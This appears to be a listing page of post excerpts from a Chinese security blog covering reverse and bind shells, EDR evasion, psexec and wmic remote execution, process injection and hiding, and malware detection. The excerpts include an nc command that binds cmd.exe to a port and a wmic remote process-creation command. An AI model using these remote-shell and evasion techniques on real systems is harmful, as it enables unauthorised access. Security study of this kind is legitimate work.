上一页 1 ··· 32 33 34 35 36 37 38 39 40 ··· 273 下一页
2022年8月1日
python 实现nc功能 免杀案例——的确可以绕过奇安信,defender这些edr
摘要: 这里仅用反弹powershell演示,大家可以发挥脑洞 自创反弹shell免杀五部曲: 1:确定想法 2:实现框架 3:增加保护 4:启动木马 5:维持会话或提权 1|2一,确定想法 用python服务器与客户端的原理制作反弹shell的控制端与被控制端, 最后执行在会话中执行恶意命令来获取一个稳定 阅读全文
posted @ 2022-08-01 16:55 bonelee 阅读(882) 评论(0) 推荐(0)
nc远控反弹shell小实践
摘要: 正向shell: 132机器A上:==>是c2的client nc.exe -L -d -e cmd.exe -p 5555 134机器B上: nc64.exe XXX.132 5555 然后就可以输入命令远控132机器了! 我的nc都放在了桌面,所以在桌面cmd即可! 反弹shell例子: 134 阅读全文
posted @ 2022-08-01 16:40 bonelee 阅读(410) 评论(0) 推荐(0)
psexec远程执行命令实践
摘要: 最终效果: C:\Users\PSTools>psexec \\XXXIP -u XXX -p XXX -i cmd.exe PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysin 阅读全文
posted @ 2022-08-01 14:59 bonelee 阅读(1671) 评论(0) 推荐(0)
win10系统中运行wmic 远程执行命令的方法
摘要: 背景:wmic 运行时候出现拒绝访问错误: wmic /node:xxxIP /user:xxx /password:xxx process call create "cmd.exe /c ipconfig>c:\users\xxx\result.txt" 错误: 描述 = 拒绝访问。 解决方法如下 阅读全文
posted @ 2022-08-01 11:47 bonelee 阅读(4336) 评论(0) 推荐(0)
2022年7月30日
深度解析恶意挖矿攻击:现状、检测及处置手册
摘要: 深度解析恶意挖矿攻击:现状、检测及处置手册 奇安信威胁情报中心 2021-11-23 11:49:21 135617 3 背景 11月16日,国家发改委举行新闻发布会,新闻发言人孟玮表示,将以产业式集中式“挖矿”、国有单位涉及“挖矿”和比特币“挖矿”为重点开展全面整治。 接连的重拳出击,体现了国家对 阅读全文
posted @ 2022-07-30 14:49 bonelee 阅读(1022) 评论(0) 推荐(0)
2022年7月29日
恶意代码上机排查思路与方法
摘要: 恶意代码上机排查思路与方法 阅览目录 1、排查标准 应急响应保留现场经验 2、特征排查-自写上机排查工具 3、进程排查 1)数字签名排查 2)联网进程排查 3)进程注入技术排查 4)进程替换技术排查 4、文件排查 1)进程文件排查 2)驱动排查 5、启动信息排查 6、内存排查 1)异地操作 2)本地 阅读全文
posted @ 2022-07-29 10:47 bonelee 阅读(693) 评论(0) 推荐(0)
进程隐藏与进程保护(SSDT Hook 实现)(一)
摘要: ssdt全称为System Services Descriptor Table,中文为系统服务描述符表,ssdt表就是把ring3的Win32 API和ring0的内核API联系起来。SSDT并不仅仅只包含一个庞大的地址索引表,它还包含着一些其它有用的信息,诸如地址索引的基地址、服务函数个数等。 s 阅读全文
posted @ 2022-07-29 10:26 bonelee 阅读(642) 评论(0) 推荐(0)
10种常见的进程注入技术的总结
摘要: 10种常见的进程注入技术的总结 原创2017-07-20 18:22·安全客小安 译者:myswsun 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 0x00 前言 进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这意味着可以将自定义代码运行 阅读全文
posted @ 2022-07-29 10:06 bonelee 阅读(223) 评论(0) 推荐(0)
2022年7月28日
开集识别——流形
摘要: 流形 维基百科,自由的百科全书 跳到导航跳到搜索 此条目已经列出参考文献,但是文内引注不足,部分内容的来源仍然不明。 (2014年1月31日)请加上合适的文内引注来改善这篇条目。 此条目需要补充更多来源。 (2013年6月24日)请协助补充多方面可靠来源以改善这篇条目,无法查证的内容可能会因为异议提 阅读全文
posted @ 2022-07-28 20:14 bonelee 阅读(287) 评论(0) 推荐(0)
如何修改smb服务的默认445端口?——官方回答是无法修改,但是可以使用端口转发
摘要: 修改SMB 445端口方法 windows 前几天的永恒之蓝,导致把445端口封掉了,可项目中用到smb协议(默认端口是445),解决办法,把smb端口改成其他,具体如下: 首先要关闭445端口,可以参考微软KB 301673中的方法,在注册表的HKEY_LOCAL_MACHINE/System/C 阅读全文
posted @ 2022-07-28 17:59 bonelee 阅读(9447) 评论(0) 推荐(0)
上一页 1 ··· 32 33 34 35 36 37 38 39 40 ··· 273 下一页